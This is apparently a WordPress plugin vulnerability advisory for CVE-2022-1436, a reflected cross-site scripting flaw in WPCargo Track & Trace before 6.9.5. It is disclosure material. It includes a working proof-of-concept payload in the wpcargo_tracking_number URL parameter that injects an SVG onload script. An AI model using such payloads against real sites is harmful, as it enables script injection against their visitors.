WordPress Plugin Vulnerabilities

WPCargo Track & Trace < 6.9.5 - Reflected Cross Site Scripting

Description

The plugin does not sanitise and escape the wpcargo_tracking_number parameter before outputting it back in the page, which could allow attackers to perform reflected Cross-Site Scripting attacks.

Proof of Concept

On a page using the [wpcargo_trackform] shortcode, append the following parameter and payload: wpcargo_tracking_number=%22%3E%3Csvg/onload=alert(/xss/)%3E

e.g: https://example.com/page-with-shortcode/?wpcargo_tracking_number=%22%3E%3Csvg/onload=alert(/xss/)%3E

Affects Plugins

Plugin icon
wpcargo
Fixed in 6.9.5

References

CVE
CVE-2022-1436

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Raul
Submitter
Raul
Verified
Yes
WPVDB ID
d5c6f894-6ad1-46f4-bd77-17ad9234cfc3

Timeline

Publicly Published
2022-04-25 (about 1 years ago)
Added
2022-04-25 (about 1 years ago)
Last Updated
2023-02-05 (about 9 months ago)

Other

Published
Title
Published
2022-03-07
Title
Akismet Privacy Policies <= 2.0.1- Reflected Cross-Site Scripting
Published
2015-07-27
Title
Hide My WP <= 4.51.1 - Stored Cross-Site Scripting (XSS)
Published
2017-11-21
Title
Emag Marketplace Connector 1.0 - Unauthenticated Cross-Site Scripting (XSS)
Published
2021-12-16
Title
Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting (XSS)
Published
2021-09-20
Title
LearnPress < 4.1.3.1 - Multiple Admin+ Stored Cross-Site Scripting